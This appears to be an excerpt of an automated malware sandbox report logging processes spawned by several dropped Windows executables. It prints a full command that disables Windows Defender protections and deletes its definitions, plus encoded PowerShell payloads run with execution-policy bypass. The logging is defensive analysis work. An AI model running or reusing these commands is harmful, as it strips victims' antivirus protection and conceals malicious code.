agacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: skotes.exe, skotes.exe, 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000059.00000002.2801126317.00000000008CD000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: I4Program Manager
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp | Binary or memory string: Shell_TrayWnd
                                Source: m9sfEU9.exe, 00000051.00000003.2634727930.0000000003045000.00000004.00000020.00020000.00000000.sdmp, FuturreApp.exe, 00000055.00000002.7286857048.0000000011193000.00000002.00000001.01000000.00000023.sdmp | Binary or memory string: Progman
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: 3_2_006ADD91 cpuid 3_2_006ADD91
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017901001\a4439a2887.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017902001\82191c1fe1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017903001\cb947ba4b8.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017904001\97bf9e137e.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017905001\4dd01d90fc.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017906001\3b81e6737d.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017907001\90ddd682ad.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017908001\2c36247645.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017909001\f8645e1e85.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017910001\fde98a8d0b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017911001\67fbb282d1.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017912001\f7b3852b06.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017913001\97d4b1071f.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017914001\db75e03f4b.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017915001\712b285aaa.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI51602 VolumeInformationJump to behavior
